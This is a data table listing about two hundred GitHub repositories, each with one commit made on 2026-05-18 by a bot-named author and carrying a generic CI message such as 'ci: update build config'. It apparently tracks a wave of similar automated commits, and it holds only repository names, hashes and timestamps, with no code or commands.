| 2375 | mikeneko-developer/MapGo | 6a34b5a60a38 | ci-bot | [email protected] | 2026-05-18T12:26:31.000Z | fix: correct build workflow |
| 2376 | kayosama007/ci-build-20260329-190429-5278 | 6a44065c51db | auto-ci | [email protected] | 2026-05-18T14:23:44.000Z | ci: add build optimization step |
| 2377 | AmarKumarShaw/dynamic-date-data-table | 6a694606df05 | build-bot | [email protected] | 2026-05-18T12:09:36.000Z | ci: update build config |
| 2378 | brahamandAI/Brahamand.ai | 6a7bb509c1cd | ci-bot | [email protected] | 2026-05-18T11:53:33.000Z | build: improve ci performance |
| 2379 | hahaha-zsq/winter-security-spring-boot-starter | 6a7fe4c21ea4 | ci-bot | [email protected] | 2026-05-18T12:06:58.000Z | chore: sync ci configuration |
| 2380 | 88daxiong/Interview | 6a85c06d2d37 | auto-ci | [email protected] | 2026-05-18T16:59:43.000Z | ci: update build config |
| 2381 | JKS-sys/JKS-sys | 6a92ea3593d4 | pipeline-bot | [email protected] | 2026-05-18T14:19:49.000Z | chore: update ci/cd pipeline |
| 2382 | azimsidd/scando | 6aa2486b1edc | auto-ci | [email protected] | 2026-05-18T13:27:00.000Z | ci: add build optimization step |
| 2383 | Davidf2004/Biblioteca-Digital | 6aa719537a03 | pipeline-bot | [email protected] | 2026-05-18T17:11:06.000Z | chore: sync ci configuration |
| 2384 | Prajwal247/JobsMonster | 6aac25819334 | ci-bot | [email protected] | 2026-05-18T13:11:45.000Z | chore: update ci/cd pipeline |
| 2385 | Davidf2004/iconic | 6aac58d6a7aa | build-bot | [email protected] | 2026-05-18T16:58:51.000Z | chore: optimize pipeline runtime |
| 2386 | namraVaidya/api_implementation | 6aacdb9245db | ci-bot | [email protected] | 2026-05-18T13:38:06.000Z | chore: update ci/cd pipeline |
| 2387 | TICIANOTAUP12/servicio_afip | 6ab5f845be2c | build-bot | [email protected] | 2026-05-18T14:14:40.000Z | chore: sync ci configuration |
| 2388 | revel-um/Yellow-Movies | 6ab7a19946fd | ci-bot | [email protected] | 2026-05-18T12:12:59.000Z | chore: optimize pipeline runtime |
| 2389 | MR-AYAN-CHOWDHURY/simsimi-command | 6ae2ff9930da | pipeline-bot | [email protected] | 2026-05-18T11:41:56.000Z | build: improve ci performance |
| 2390 | Dyybyy/booking-table | 6ae8ac8ed1a3 | pipeline-bot | [email protected] | 2026-05-18T13:27:05.000Z | chore: sync ci configuration |
| 2391 | bishaldahal4777/image-uploader | 6aee7736437f | pipeline-bot | [email protected] | 2026-05-18T13:31:12.000Z | ci: update build config |
| 2392 | anshvarma07/WartsilaPorts | 6b124faa3754 | pipeline-bot | [email protected] | 2026-05-18T13:40:19.000Z | chore: update ci/cd pipeline |
| 2393 | mirfanjazuli/Tugas6 | 6b3fa95337d7 | ci-bot | [email protected] | 2026-05-18T16:41:34.000Z | chore: optimize pipeline runtime |
| 2394 | leytomfernando-droid/test-action-1778997996399686597 | 6b4c2be7fb90 | build-bot | [email protected] | 2026-05-18T16:55:14.000Z | fix: correct build workflow |
| 2395 | Raja244/Explore-India | 6b4d82d73de0 | ci-bot | [email protected] | 2026-05-18T15:47:41.000Z | fix: correct build workflow |
| 2396 | saksham-tech/AAPS | 6b54ee33859c | ci-bot | [email protected] | 2026-05-18T17:11:54.000Z | ci: update build config |
| 2397 | mosesnkoromo/PersonalEpenditure | 6b564d3b795d | ci-bot | [email protected] | 2026-05-18T13:15:44.000Z | build: improve ci performance |
| 2398 | David-Irihose/alu-scripting | 6b5fd0449f43 | pipeline-bot | [email protected] | 2026-05-18T13:26:57.000Z | ci: update build config |
| 2399 | dpaetsch/nasa_horizons_api | 6b61c0c60ae4 | build-bot | [email protected] | 2026-05-18T13:28:30.000Z | chore: sync ci configuration |
| 2400 | andersonphiri/taskboards | 6b65b5cb3f4c | pipeline-bot | [email protected] | 2026-05-18T13:58:23.000Z | chore: optimize pipeline runtime |
| 2401 | dpaetsch/Lighting-for-Impossible-Spaces | 6b780b5a9cfd | build-bot | [email protected] | 2026-05-18T13:25:59.000Z | build: improve ci performance |
| 2402 | pranto2051/crom_extantion_001 | 6b7eba48e865 | ci-bot | [email protected] | 2026-05-18T14:05:27.000Z | ci: update build config |
| 2403 | theabhinavpal/Birthday-Cake | 6b83fc79ab71 | ci-bot | [email protected] | 2026-05-18T16:02:25.000Z | ci: update build config |
| 2404 | atb9210/diet-plan-ai | 6b9e6055fedd | ci-bot | [email protected] | 2026-05-18T13:50:08.000Z | chore: optimize pipeline runtime |
| 2405 | mk016/CodeSpace | 6baf8266f181 | build-bot | [email protected] | 2026-05-18T16:41:03.000Z | ci: update build config |
| 2406 | CTSE-book-exchange-system/React-App | 6bc2d34b45f9 | build-bot | [email protected] | 2026-05-18T13:57:21.000Z | build: improve ci performance |
| 2407 | guimmamanna/ras-testing-projects | 6bd2ebe1dc6b | pipeline-bot | [email protected] | 2026-05-18T13:05:04.000Z | fix: correct build workflow |
| 2408 | batnano/test-action-9ccb472efda7 | 6be3a9eb68ce | build-bot | [email protected] | 2026-05-18T15:27:05.000Z | ci: add build optimization step |
| 2409 | Denis10/bottom_sheet | 6bf7244486db | pipeline-bot | [email protected] | 2026-05-18T13:55:53.000Z | fix: correct build workflow |
| 2410 | kasumusof/afcon-2019-tournament-visualization | 6bf86a11f8b4 | build-bot | [email protected] | 2026-05-18T12:50:57.000Z | chore: update ci/cd pipeline |
| 2411 | varunvaghasiya11/Day-10-challange | 6c083c0eae97 | pipeline-bot | [email protected] | 2026-05-18T13:54:03.000Z | chore: sync ci configuration |
| 2412 | ShaileshS237/clock | 6c0ee1047e5f | ci-bot | [email protected] | 2026-05-18T17:01:03.000Z | ci: update build config |
| 2413 | Srj-Love/AndroidTP | 6c1028c3bd6e | auto-ci | [email protected] | 2026-05-18T12:52:44.000Z | fix: correct build workflow |
| 2414 | andersonphiri/python_beginner_to_advanced | 6c29a52a448d | ci-bot | [email protected] | 2026-05-18T13:53:46.000Z | chore: optimize pipeline runtime |
| 2415 | yashlad27/test-action-1778966162126996506 | 6c3e09fc7802 | pipeline-bot | [email protected] | 2026-05-18T13:14:42.000Z | fix: correct build workflow |
| 2416 | b1kaf7/test-action-1778959304139542815 | 6c414cfb5d6e | ci-bot | [email protected] | 2026-05-18T15:25:54.000Z | chore: sync ci configuration |
| 2417 | Rajesh0055/Rajesh0055 | 6c43f0a56dbf | pipeline-bot | [email protected] | 2026-05-18T13:39:40.000Z | chore: optimize pipeline runtime |
| 2418 | saradune6/OCR-using-GEN-Ai | 6c4429b754c4 | pipeline-bot | [email protected] | 2026-05-18T13:01:17.000Z | build: improve ci performance |
| 2419 | umairabhatti786/test-action-1779100877031905805 | 6c505d68ca57 | auto-ci | [email protected] | 2026-05-18T12:29:25.000Z | chore: sync ci configuration |
| 2420 | Yousif-12/test-action-1778959304061676355 | 6c6cc2d6b26f | build-bot | [email protected] | 2026-05-18T13:28:18.000Z | ci: add build optimization step |
| 2421 | andersonphiri/quarkiverse-algorithms | 6c7b8990ad95 | pipeline-bot | [email protected] | 2026-05-18T13:54:44.000Z | ci: add build optimization step |
| 2422 | ahtisham02/mtn_data_frontend | 6c812a448cc1 | auto-ci | [email protected] | 2026-05-18T15:22:33.000Z | ci: update build config |
| 2423 | naytanvieira/intro-yii2 | 6c8d87f27a35 | auto-ci | [email protected] | 2026-05-18T15:13:32.000Z | build: improve ci performance |
| 2424 | umakantmukhiya/rde-dictionary-setup-guide | 6c8f612ff3a0 | ci-bot | [email protected] | 2026-05-18T15:44:02.000Z | chore: sync ci configuration |
| 2425 | PMabertay/MainRep | 6cc6065bdfd8 | auto-ci | [email protected] | 2026-05-18T13:39:07.000Z | build: improve ci performance |
| 2426 | maheshchonde89-ctrl/test-action-1778964631228786538 | 6cdebbfb1c71 | auto-ci | [email protected] | 2026-05-18T12:48:53.000Z | ci: add build optimization step |
| 2427 | deploy11/tarjimabot | 6ce9fb861e6b | auto-ci | [email protected] | 2026-05-18T11:53:52.000Z | fix: correct build workflow |
| 2428 | ZunsodB/GreenRoom-Frontend | 6cf1f3104b7c | ci-bot | [email protected] | 2026-05-18T16:24:10.000Z | fix: correct build workflow |
| 2429 | MarkleyClassroom/Week-2-Completed-Files | 6cf9836f65c2 | pipeline-bot | [email protected] | 2026-05-18T16:36:19.000Z | chore: optimize pipeline runtime |
| 2430 | maheskumar-as/ippopay | 6cfbb4ca69fb | ci-bot | [email protected] | 2026-05-18T13:32:29.000Z | chore: optimize pipeline runtime |
| 2431 | mukesh682/PRODIGY_DS_04 | 6d0fab73b368 | ci-bot | [email protected] | 2026-05-18T12:16:10.000Z | chore: update ci/cd pipeline |
| 2432 | NaimurDev/kotlin_kilo_to_pound_apk | 6d12d6c6804f | build-bot | [email protected] | 2026-05-18T15:54:21.000Z | ci: update build config |
| 2433 | happyharbor/salary-calculator | 6d18371d0da8 | auto-ci | [email protected] | 2026-05-18T14:43:33.000Z | chore: sync ci configuration |
| 2434 | anshvarma07/NetflixClone | 6d1f52a4f5ff | auto-ci | [email protected] | 2026-05-18T13:39:37.000Z | chore: optimize pipeline runtime |
| 2435 | christinahuangg/jymmy | 6d1fdcc54b03 | ci-bot | [email protected] | 2026-05-18T16:37:52.000Z | fix: correct build workflow |
| 2436 | aurore017/alu-zero_day | 6d212cf3f434 | auto-ci | [email protected] | 2026-05-18T13:29:10.000Z | chore: sync ci configuration |
| 2437 | cleaptln/album-photo | 6d2ec393c6a9 | auto-ci | [email protected] | 2026-05-18T14:00:55.000Z | fix: correct build workflow |
| 2438 | b1kaf7/test-action-1779100547251415154 | 6d2f25f5ad16 | pipeline-bot | [email protected] | 2026-05-18T15:25:03.000Z | build: improve ci performance |
| 2439 | azimsidd/TodoList | 6d4128368903 | ci-bot | [email protected] | 2026-05-18T13:25:12.000Z | chore: update ci/cd pipeline |
| 2440 | abdel1452/Snack-Palace | 6d499e15fd11 | build-bot | [email protected] | 2026-05-18T11:58:41.000Z | chore: sync ci configuration |
| 2441 | Akisan98/encrypted | 6d4f246fd043 | build-bot | [email protected] | 2026-05-18T14:05:23.000Z | fix: correct build workflow |
| 2442 | kayosama007/ci-build-20260329-185640-9436 | 6d76c2cfa3f1 | build-bot | [email protected] | 2026-05-18T14:26:03.000Z | chore: sync ci configuration |
| 2443 | guimmamanna/Api-Inspector | 6d779ab39909 | auto-ci | [email protected] | 2026-05-18T13:02:10.000Z | build: improve ci performance |
| 2444 | HarrisonScap/GameAI-FinalProject | 6d8626f2ed8d | build-bot | [email protected] | 2026-05-18T16:13:31.000Z | chore: sync ci configuration |
| 2445 | BookMyDiamond/assignment-ionic | 6d95ab8eae70 | build-bot | [email protected] | 2026-05-18T13:45:39.000Z | chore: optimize pipeline runtime |
| 2446 | kozlowski98/test-action-1779100547152044783 | 6db0fe9a1832 | build-bot | [email protected] | 2026-05-18T13:38:45.000Z | build: improve ci performance |
| 2447 | jlendor/Dev-Dynasty | 6db1236a92ea | pipeline-bot | [email protected] | 2026-05-18T12:12:13.000Z | chore: sync ci configuration |
| 2448 | foreiner/teamproject1_teamPage | 6dc1470dc511 | auto-ci | [email protected] | 2026-05-18T12:04:18.000Z | ci: update build config |
| 2449 | JKS-sys/-Sparta-Coding-Club-TIL-Mission-At-Week-One-And-Day-Two.-Homework-Submission-form-Week-1-2-11-Sun-. | 6dcc8ca77007 | auto-ci | [email protected] | 2026-05-18T14:22:27.000Z | chore: update ci/cd pipeline |
| 2450 | andersonphiri/solidity-design-patterns-and-security | 6dd5f66be31f | pipeline-bot | [email protected] | 2026-05-18T13:56:10.000Z | ci: update build config |
| 2451 | chicoluan/ClarifionUpsell | 6dee7e555a35 | auto-ci | [email protected] | 2026-05-18T12:26:56.000Z | fix: correct build workflow |
| 2452 | smallziz18/backend-project-niakhtu | 6deed5ef9eb6 | ci-bot | [email protected] | 2026-05-18T12:10:28.000Z | chore: sync ci configuration |
| 2453 | Warit314/GenAI | 6df18e503b63 | auto-ci | [email protected] | 2026-05-18T16:51:29.000Z | ci: update build config |
| 2454 | varunvaghasiya11/Mock_round_3 | 6df22aa8eea0 | auto-ci | [email protected] | 2026-05-18T13:55:16.000Z | ci: add build optimization step |
| 2455 | Warit314/MyWebsite | 6e05945accaf | build-bot | [email protected] | 2026-05-18T16:47:00.000Z | ci: add build optimization step |
| 2456 | iamarevalo/public_data | 6e07baae29e5 | pipeline-bot | [email protected] | 2026-05-18T13:10:53.000Z | chore: sync ci configuration |
| 2457 | MaximKabaev/digit-recognition | 6e23769fd4c3 | pipeline-bot | [email protected] | 2026-05-18T14:32:42.000Z | chore: sync ci configuration |
| 2458 | govindchintapalli/speech_based_servant_bot_group11_cs308_2012 | 6e3c82b01417 | auto-ci | [email protected] | 2026-05-18T13:47:51.000Z | build: improve ci performance |
| 2459 | azimsidd/NotesApp | 6e3f6072c62a | build-bot | [email protected] | 2026-05-18T13:27:05.000Z | chore: optimize pipeline runtime |
| 2460 | pranto2051/myTestReop | 6e46f01cb206 | auto-ci | [email protected] | 2026-05-18T14:13:28.000Z | ci: add build optimization step |
| 2461 | VietNamCombatZ/SGROUP-Back-end-Basic | 6e55afd3d90f | build-bot | [email protected] | 2026-05-18T15:49:53.000Z | build: improve ci performance |
| 2462 | yaj457/Workplace-Project | 6e75c120d0ef | ci-bot | [email protected] | 2026-05-18T12:46:03.000Z | fix: correct build workflow |
| 2463 | osamahkenawy/namePhoto | 6e8191747ab1 | pipeline-bot | [email protected] | 2026-05-18T15:20:05.000Z | fix: correct build workflow |
| 2464 | leosouliotis/StoBlock | 6e9566fd6cec | pipeline-bot | [email protected] | 2026-05-18T15:44:49.000Z | chore: sync ci configuration |
| 2465 | bbarreto96/Volunteer-FORM-CSS- | 6e987b54f1bb | auto-ci | [email protected] | 2026-05-18T16:52:55.000Z | ci: update build config |
| 2466 | markvmidd/test-action-1778966162036086577 | 6e98d1b8058d | pipeline-bot | [email protected] | 2026-05-18T11:59:10.000Z | ci: add build optimization step |
| 2467 | andersonphiri/vuetify-dashboard | 6e9cf144edfb | ci-bot | [email protected] | 2026-05-18T13:58:04.000Z | fix: correct build workflow |
| 2468 | kayosama007/ci-build-20260329-190643-9063 | 6ea96d73782a | auto-ci | [email protected] | 2026-05-18T14:22:59.000Z | ci: update build config |
| 2469 | yashlad27/VisaPaymentNetworkManager | 6ecaf466aaaa | build-bot | [email protected] | 2026-05-18T13:27:12.000Z | ci: add build optimization step |
| 2470 | TarunyaProgrammer/MindBridge | 6ecd399a56af | ci-bot | [email protected] | 2026-05-18T13:32:30.000Z | chore: optimize pipeline runtime |
| 2471 | arpita009/beginning_angular | 6eda1342f450 | ci-bot | [email protected] | 2026-05-18T16:35:06.000Z | chore: sync ci configuration |
| 2472 | onenarok777/vite-react-calendar | 6edc9fbdd602 | pipeline-bot | [email protected] | 2026-05-18T12:48:01.000Z | chore: sync ci configuration |
| 2473 | gabrielle-ux/Prototype-SWEN2165 | 6ee8a38765b8 | build-bot | [email protected] | 2026-05-18T15:35:59.000Z | fix: correct build workflow |
| 2474 | BrandonC4/sop | 6ef6274a2cce | ci-bot | [email protected] | 2026-05-18T13:41:15.000Z | chore: optimize pipeline runtime |
| 2475 | dark733/Java-Password-Generator-Manager-GUI | 6ef78a7ad8cc | pipeline-bot | [email protected] | 2026-05-18T14:06:13.000Z | ci: add build optimization step |
| 2476 | VietNamCombatZ/PBL4 | 6efb31f574ef | pipeline-bot | [email protected] | 2026-05-18T15:42:37.000Z | chore: optimize pipeline runtime |
| 2477 | Richonn/PipelineForge | 6efbf98e2dc4 | ci-bot | [email protected] | 2026-05-18T14:01:14.000Z | ci: add build optimization step |
| 2478 | chicoluan/magazord-frontend | 6efce0cc393a | build-bot | [email protected] | 2026-05-18T12:21:34.000Z | fix: correct build workflow |
| 2479 | iamroshanpatak/website | 6f12666177c1 | ci-bot | [email protected] | 2026-05-18T16:30:54.000Z | build: improve ci performance |
| 2480 | Kevin-max-design/portfolio | 6f1f9a3610bf | build-bot | [email protected] | 2026-05-18T16:25:47.000Z | build: improve ci performance |
| 2481 | umairabhatti786/ValueSportNetwork | 6f2d14fcc47c | ci-bot | [email protected] | 2026-05-18T13:00:36.000Z | chore: sync ci configuration |
| 2482 | hajarabesque/BLOGART26_Groupe5 | 6f4263cdbf36 | auto-ci | [email protected] | 2026-05-18T15:53:04.000Z | ci: update build config |
| 2483 | vrct07/html-css-projects | 6f4f2d774023 | pipeline-bot | [email protected] | 2026-05-18T14:25:32.000Z | build: improve ci performance |
| 2484 | naveenld024/flutter_install_plugin | 6f54d5caf664 | build-bot | [email protected] | 2026-05-18T13:28:53.000Z | chore: update ci/cd pipeline |
| 2485 | Tiledesk/tiledesk-telegram-connector | 6f61c4d3e5d8 | pipeline-bot | [email protected] | 2026-05-18T13:08:30.000Z | chore: sync ci configuration |
| 2486 | aalmonzer/Data-Science | 6f866d9db7f5 | build-bot | [email protected] | 2026-05-18T13:00:36.000Z | chore: optimize pipeline runtime |
| 2487 | R-Dinesh-Kumar2004/Project-Learning | 6f8a4e6ad681 | build-bot | [email protected] | 2026-05-18T14:07:38.000Z | build: improve ci performance |
| 2488 | 3xpertnoob/drf-inventory | 6f9bee8d1aa3 | pipeline-bot | [email protected] | 2026-05-18T12:12:16.000Z | chore: sync ci configuration |
| 2489 | phase23/punchclock | 6fa42dde2d95 | pipeline-bot | [email protected] | 2026-05-18T11:43:35.000Z | ci: add build optimization step |
| 2490 | c0der0jal/OS | 6fb1827754d5 | auto-ci | [email protected] | 2026-05-18T12:54:09.000Z | build: improve ci performance |
| 2491 | just-abdullah-dev/scad_lab_final | 6fbb44898f87 | build-bot | [email protected] | 2026-05-18T13:53:37.000Z | ci: update build config |
| 2492 | akashcruz/network-intrusion-detection-sytsem | 6fbdf0ed3200 | auto-ci | [email protected] | 2026-05-18T13:06:50.000Z | ci: add build optimization step |
| 2493 | ahtisham02/vector_co | 6fdde55bf00f | pipeline-bot | [email protected] | 2026-05-18T15:20:42.000Z | build: improve ci performance |
| 2494 | praktikum-java/emojicon-work-rev-trunk | 6febe16d1d2f | auto-ci | [email protected] | 2026-05-18T13:55:20.000Z | ci: update build config |
| 2495 | Gaucho-Rocket-Project/Simulations | 6ffb969fe4ed | pipeline-bot | [email protected] | 2026-05-18T13:05:18.000Z | ci: update build config |
| 2496 | musatekin/Text-Summarizer | 700127e9cb33 | build-bot | [email protected] | 2026-05-18T17:07:23.000Z | ci: update build config |
| 2497 | huyparody/RxSwift-Multi-Threading-Example | 7004a88bc60d | auto-ci | [email protected] | 2026-05-18T14:16:54.000Z | chore: update ci/cd pipeline |
| 2498 | gitfarag/Circleci-RN | 700aae0d9110 | auto-ci | [email protected] | 2026-05-18T17:28:07.000Z | chore: optimize pipeline runtime |
| 2499 | umairabhatti786/RbmboApp | 700c57951c93 | build-bot | [email protected] | 2026-05-18T12:58:25.000Z | build: improve ci performance |
| 2500 | thebenmerlin/mock-api | 70169358f380 | pipeline-bot | [email protected] | 2026-05-18T12:20:15.000Z | ci: add build optimization step |
| 2501 | Christian-School-Projects/OperatingSystemsAssignment1 | 70193faa7a2a | ci-bot | [email protected] | 2026-05-18T15:21:42.000Z | build: improve ci performance |
| 2502 | marcusvar/myapp | 7020200fed70 | build-bot | [email protected] | 2026-05-18T14:19:16.000Z | chore: sync ci configuration |
| 2503 | atb9210/B2B-Tech-Platform-PrimoIT | 70298a1af2dd | build-bot | [email protected] | 2026-05-18T13:53:06.000Z | chore: optimize pipeline runtime |
| 2504 | ammadey7/map-telegram-bot | 70461ba8614c | ci-bot | [email protected] | 2026-05-18T13:12:06.000Z | chore: optimize pipeline runtime |
| 2505 | Prajwal247/django | 704bfd07d806 | build-bot | [email protected] | 2026-05-18T13:16:55.000Z | ci: update build config |
| 2506 | MoustafaElsaghier/SiWareTask | 705a94bc53cd | ci-bot | [email protected] | 2026-05-18T15:34:30.000Z | chore: optimize pipeline runtime |
| 2507 | ConnectSiteForge/docs-rxj1qq | 705ac33f78d7 | ci-bot | [email protected] | 2026-05-18T14:34:53.000Z | ci: add build optimization step |
| 2508 | cybxrrgsouraabh/Langchain-Projects | 705c65b7b666 | auto-ci | [email protected] | 2026-05-18T12:15:58.000Z | chore: update ci/cd pipeline |
| 2509 | ahtisham02/windowproject | 70717b62ac09 | auto-ci | [email protected] | 2026-05-18T15:35:05.000Z | ci: update build config |
| 2510 | ahtisham02/leadeo.io | 7074fe1b4175 | ci-bot | [email protected] | 2026-05-18T15:22:46.000Z | chore: sync ci configuration |
| 2511 | the-wilful-youth/LookMate | 707eb5e03662 | ci-bot | [email protected] | 2026-05-18T16:26:30.000Z | build: improve ci performance |
| 2512 | EnamulBokshi/my-portfolio | 709429d15679 | build-bot | [email protected] | 2026-05-18T15:29:34.000Z | fix: correct build workflow |
| 2513 | Kemelvor/kemelvor.github.io | 70bbe0a054d3 | build-bot | [email protected] | 2026-05-18T16:55:33.000Z | ci: add build optimization step |
| 2514 | Kalaganov-Konstantin/messenger | 70d07f53900b | auto-ci | [email protected] | 2026-05-18T13:45:28.000Z | ci: update build config |
| 2515 | kozlowski98/dev-environment-in-EC2-with-terraform | 70d648df159b | auto-ci | [email protected] | 2026-05-18T13:40:35.000Z | ci: add build optimization step |
| 2516 | RameshRukshan/Python_Model_For_Create-loan-analysis-dataset | 70e257e76dd8 | ci-bot | [email protected] | 2026-05-18T17:27:06.000Z | ci: add build optimization step |
| 2517 | sakunamiq/AssaultCube-PyMeow-Cheat | 70e342a499fa | ci-bot | [email protected] | 2026-05-18T12:25:53.000Z | build: improve ci performance |
| 2518 | git-init-priyanshu/solana-programs | 70e3855d3fe0 | auto-ci | [email protected] | 2026-05-18T16:53:07.000Z | ci: update build config |
| 2519 | akash-guptaa/Book-App | 7107d869581c | build-bot | [email protected] | 2026-05-18T16:12:07.000Z | fix: correct build workflow |
| 2520 | azimsidd/Unicard_Compose | 7116dd985eda | ci-bot | [email protected] | 2026-05-18T13:21:46.000Z | chore: update ci/cd pipeline |
| 2521 | muhammad6643438/TeamHighOnFlutter-Charity-closet | 71223644e0b5 | build-bot | [email protected] | 2026-05-18T13:48:52.000Z | chore: optimize pipeline runtime |
| 2522 | EnamulBokshi/Real-time-chat-app | 71373fcdd359 | build-bot | [email protected] | 2026-05-18T15:32:23.000Z | chore: update ci/cd pipeline |
| 2523 | kingjamesegun/Tracker_App | 713c38653e43 | build-bot | [email protected] | 2026-05-18T12:20:07.000Z | ci: add build optimization step |
| 2524 | musatekin/project1 | 71474b91503d | auto-ci | [email protected] | 2026-05-18T17:01:21.000Z | chore: optimize pipeline runtime |
| 2525 | NalineeKant-82/my-portfolio | 715ec94f9d1e | build-bot | [email protected] | 2026-05-18T17:46:54.000Z | chore: sync ci configuration |
| 2526 | muhammadhammadd7/Real-Estate-Ai-Investment | 716866eb578c | auto-ci | [email protected] | 2026-05-18T13:46:23.000Z | chore: optimize pipeline runtime |
| 2527 | Akshith809/test-action-1778966162070853964 | 717439da4a8c | auto-ci | [email protected] | 2026-05-18T13:11:11.000Z | build: improve ci performance |
| 2528 | 0xdps/devutil-tools | 717af37f736a | auto-ci | [email protected] | 2026-05-18T13:58:50.000Z | ci: update build config |
| 2529 | anshvarma07/tododeploy | 717d2196e6d7 | build-bot | [email protected] | 2026-05-18T13:41:26.000Z | chore: optimize pipeline runtime |
| 2530 | ahmedux03/Cyber_Assignment | 717ed3a9514a | auto-ci | [email protected] | 2026-05-18T12:22:44.000Z | chore: optimize pipeline runtime |
| 2531 | jnrveneracion/length-converter-with-formula | 71814fe10ca5 | build-bot | [email protected] | 2026-05-18T13:13:13.000Z | fix: correct build workflow |
| 2532 | ShayanHasanKhan0/foundry-moodnft | 718660079ad3 | build-bot | [email protected] | 2026-05-18T16:37:51.000Z | build: improve ci performance |
| 2533 | WaveCloudx/scraper | 71877e60c33e | build-bot | [email protected] | 2026-05-18T13:49:41.000Z | ci: add build optimization step |
| 2534 | Udbhav-2k25/udbhav-ht100-cv-008 | 718d315bd99a | auto-ci | [email protected] | 2026-05-18T13:06:49.000Z | fix: correct build workflow |
| 2535 | kasumusof/coding-with-john | 71ae9479bd61 | pipeline-bot | [email protected] | 2026-05-18T12:50:07.000Z | build: improve ci performance |
| 2536 | Kujo-f/alx-zero_day | 71b59e6ee949 | auto-ci | [email protected] | 2026-05-18T11:56:29.000Z | ci: add build optimization step |
| 2537 | whyoolw/whymacfile | 71cbe829af9f | ci-bot | [email protected] | 2026-05-18T12:34:50.000Z | chore: update ci/cd pipeline |
| 2538 | kkinch420/test-action-1779110816453228032 | 71e7b61364ba | build-bot | [email protected] | 2026-05-18T13:17:40.000Z | build: improve ci performance |
| 2539 | darkpixels201/MANU_VDK | 71ebf92b797b | pipeline-bot | [email protected] | 2026-05-18T13:34:49.000Z | ci: update build config |
| 2540 | jamier2007/test-action-1778997996740533179 | 71f8e3c74f72 | ci-bot | [email protected] | 2026-05-18T13:30:21.000Z | ci: update build config |
| 2541 | tranbaolong19/vpsuseer | 72157fce2997 | build-bot | [email protected] | 2026-05-18T13:43:22.000Z | build: improve ci performance |
| 2542 | MaybeBroken/spreadsheetGrader | 721a2068fbe5 | pipeline-bot | [email protected] | 2026-05-18T17:08:47.000Z | chore: update ci/cd pipeline |
| 2543 | leonardoward/Sensor-Based-Ambient-Lights | 722852d3ee9b | ci-bot | [email protected] | 2026-05-18T14:20:08.000Z | ci: add build optimization step |
| 2544 | ISC2005/sia-isc | 7232bd599c9a | auto-ci | [email protected] | 2026-05-18T13:00:35.000Z | build: improve ci performance |
| 2545 | igorKopylov/test-task | 7240dad482f1 | pipeline-bot | [email protected] | 2026-05-18T13:24:19.000Z | build: improve ci performance |
| 2546 | anshvarma07/twitterClone | 724a13a5f2bd | build-bot | [email protected] | 2026-05-18T13:39:53.000Z | chore: optimize pipeline runtime |
| 2547 | GilgulimTwitchProjects/StreamListener | 724a8ac778ad | auto-ci | [email protected] | 2026-05-18T17:07:03.000Z | chore: optimize pipeline runtime |
| 2548 | pranto2051/satarpara-school | 724c2d185494 | pipeline-bot | [email protected] | 2026-05-18T14:17:49.000Z | ci: update build config |
| 2549 | dark733/JOpenTextEditor | 725a8ed07a2c | build-bot | [email protected] | 2026-05-18T14:01:02.000Z | fix: correct build workflow |
| 2550 | phonephachan/Lao-Calendar-Project | 725c9e40a714 | ci-bot | [email protected] | 2026-05-18T12:12:43.000Z | fix: correct build workflow |
| 2551 | Akisan98/akisan98.github.io | 7261f2496d56 | build-bot | [email protected] | 2026-05-18T14:06:58.000Z | build: improve ci performance |
| 2552 | RobertLlb/VirtualAssistJarvis | 72667a60a0df | pipeline-bot | [email protected] | 2026-05-18T14:33:37.000Z | ci: update build config |
| 2553 | ShaileshS237/BktCard | 727c9fe8fa85 | pipeline-bot | [email protected] | 2026-05-18T16:51:13.000Z | chore: update ci/cd pipeline |
| 2554 | gioeste/vpsminingcore | 72abf89e30e2 | ci-bot | [email protected] | 2026-05-18T13:04:05.000Z | fix: correct build workflow |
| 2555 | satriagibran20/wahblaz | 72af77fc6302 | pipeline-bot | [email protected] | 2026-05-18T14:37:01.000Z | ci: add build optimization step |
| 2556 | thecodinglive/springBootStarterInstagram | 72b12637bc5f | pipeline-bot | [email protected] | 2026-05-18T12:42:59.000Z | ci: update build config |
| 2557 | ZecureFunds/app | 72d899255de2 | auto-ci | [email protected] | 2026-05-18T13:42:56.000Z | chore: update ci/cd pipeline |
| 2558 | HamzaElMkhantar/LinkedIn-clone | 72e6b7e6ce3f | pipeline-bot | [email protected] | 2026-05-18T17:24:13.000Z | fix: correct build workflow |
| 2559 | radubunea/api-design-nodejs | 72fbd83c81a5 | auto-ci | [email protected] | 2026-05-18T12:41:46.000Z | build: improve ci performance |
| 2560 | 0xdps/banking-system | 73006d6eccb9 | build-bot | [email protected] | 2026-05-18T14:01:36.000Z | ci: add build optimization step |
| 2561 | BryanAlexanderSantoso/backup-laptop | 730184ff5d6b | pipeline-bot | [email protected] | 2026-05-18T13:48:38.000Z | chore: sync ci configuration |
| 2562 | CreativeMasterBonin/cmatd-neo | 730eae490123 | auto-ci | [email protected] | 2026-05-18T14:04:37.000Z | fix: correct build workflow |
| 2563 | unbankedgroup/lumara-blog | 7316699ca20e | pipeline-bot | [email protected] | 2026-05-18T11:53:34.000Z | ci: update build config |
| 2564 | fadexadex/fadexadex | 73176ad0b976 | pipeline-bot | [email protected] | 2026-05-18T16:58:46.000Z | ci: add build optimization step |
| 2565 | nishchalrautela/Diabetes-Prediction | 7323d50e1b88 | build-bot | [email protected] | 2026-05-18T16:25:08.000Z | ci: update build config |
| 2566 | EnamulBokshi/14DaysCppChallenges | 7337bb69d36a | build-bot | [email protected] | 2026-05-18T15:33:08.000Z | ci: update build config |
| 2567 | deploy11/nurazizcom | 734286d15792 | pipeline-bot | [email protected] | 2026-05-18T11:51:49.000Z | build: improve ci performance |
| 2568 | gitfarag/svelt | 735674274e31 | build-bot | [email protected] | 2026-05-18T17:29:47.000Z | build: improve ci performance |
| 2569 | HarshAgnihotri9/music-project | 73584313158b | build-bot | [email protected] | 2026-05-18T12:11:52.000Z | ci: update build config |
| 2570 | Mostakim0978/YouTube-premium | 735bfb997ea4 | auto-ci | [email protected] | 2026-05-18T11:43:20.000Z | build: improve ci performance |
| 2571 | kayosama007/ci-build-0048 | 735c935e5fd4 | build-bot | [email protected] | 2026-05-18T14:26:13.000Z | chore: optimize pipeline runtime |
| 2572 | MaximKabaev/mechatronics-examples | 736aa8af64ac | build-bot | [email protected] | 2026-05-18T14:19:56.000Z | fix: correct build workflow |
| 2573 | jenna-studio/color-visualizer | 739e9cb89805 | build-bot | [email protected] | 2026-05-18T12:24:33.000Z | chore: optimize pipeline runtime |
